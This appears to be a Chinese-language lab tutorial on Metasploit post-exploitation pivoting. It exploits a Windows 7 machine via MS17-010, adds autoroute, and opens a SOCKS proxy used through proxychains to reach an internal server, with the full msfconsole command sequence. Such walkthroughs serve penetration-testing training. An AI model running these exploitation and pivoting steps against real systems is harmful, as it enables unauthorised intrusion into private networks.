MSF开启socks代理内网渗透
简介
当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。
MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。
测试环境
kali: 192.168.95.128
windows7: 192.168.95.169 ; 192.168.70.3
server2012: 192.168.70.2
MSF会话
先扫描一下网段,windows7存在永恒之蓝漏洞,利用msf漏洞利用模块拿shell
这里使用fscan扫描出来windows7存在两张网卡;95网段可以连通;70网段无法连通
msfconsole
search ms17-010
use 0
set rhost 目标主机ip
exploit
成功返回shell,ms17-010权限是系统权限很高
添加路由
使用代理之前,需要先添加路由,让MSF能到达目标机器内网。
这里socks模块只是将代理设置为监听的端口(默认是1080),通过proxychains的流量都转给本地的1080端口,因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。
background #将会话置于后台
sessions #查看后台会话连接
search autoroute
use 0
set sessions 1
run
route print #打印路由
这时候已经可以访问到server2012机器了,但是到这里只能是msf
使用,其它的应用依然无法访问
MSF搭建socks代理
search socks
use 0
options #查看模块参数
run
连接socks代理
修改proxychains配置
vi /etc/proxychains4.conf
然后在需要执行的命令前加上 proxychains命令
例如: proxychains ping 192.168.70.2 -c4
声明
提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。
结语
那些能让你变好的事,最开始也许不容易,但最后一定能成长。
MSF开启socks代理内网渗透相关推荐
- msf监听php反弹shell,使用msf进行反弹shell+内网渗透
首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令 反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口.下面开 ...
- 网络靶场实战-记一次大型内网渗透实践 【完结篇】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景回顾 上回书说到通过一系 ...
- 网络靶场实战-记一次大型内网渗透实践 【一】
本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...
- 记录一次SQL引起的内网渗透
点击上方的终端研发部,右上角选择"设为星标" 作者:i春秋作家 原文:https://bbs.ichunqiu.com/thread-58227-1-1.html 一 . 前言 近 ...
- 内网渗透测试 MSF搭建socks代理
环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- 内网渗透代理转发详解及工具介绍
介绍一下个人网站 欢迎各位大佬光顾 http://www.sec0nd.top 文章目录 前言 正向代理和反向代理 正向代理 反向代理 举例辨别两者 内网渗透中代理的作用 工具介绍 msf nps f ...
- 三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
最新文章
- 暑期集训3:几何基础 练习题D: HDU - 2036 ​​​​​​​
- 【HDOJ】2209 翻纸牌游戏
- 算法---删除排序链表中的重复元素 II
- 使用开发者工具调试jsp页面中的脚本
- HTMLElement对象
- SQL 注入竟然把我们的系统搞挂了
- 使用注解方式搭建SpringMVC
- 企业LNMP环境应用
- 商业分析师的要求与必备技能
- 微信公众号网页授权域名和JS接口安全域名配置攻略
- 解密阿里云大规模深度学习性能优化实践
- P、NP、NPC概念总结
- 计算机无法连接网络错误651,Win7宽带连接错误651的原因和解决方法
- 想借微商发家?打造千万级分销体系的方法论在这里!
- 2.2.1 数据通信系统的模型
- 第二十次ScrumMeeting博客
- 程序员的编辑器—VIM(怀念Unix下的岁月)
- 怎么在excel中对比两列数据并查找重复项
- iPhone 设置铃声
- hadoop shuffle 学习